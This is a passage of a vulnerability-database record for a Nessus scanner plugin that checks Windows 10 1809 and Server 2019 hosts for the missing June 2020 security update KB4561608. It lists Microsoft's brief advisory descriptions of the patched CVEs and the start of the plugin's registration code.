(CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561608.NASL", "href": "https://www.tenable.com/plugins/nessus/137256", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137256);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561608\");\n script_xref(name:\"MSFT\", value:\"MS20-4561608\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561608.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)\");\n # https://support.microsoft.com/en-us/help/4561608/windows-10-update-kb4561608\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42cd5594\");\n 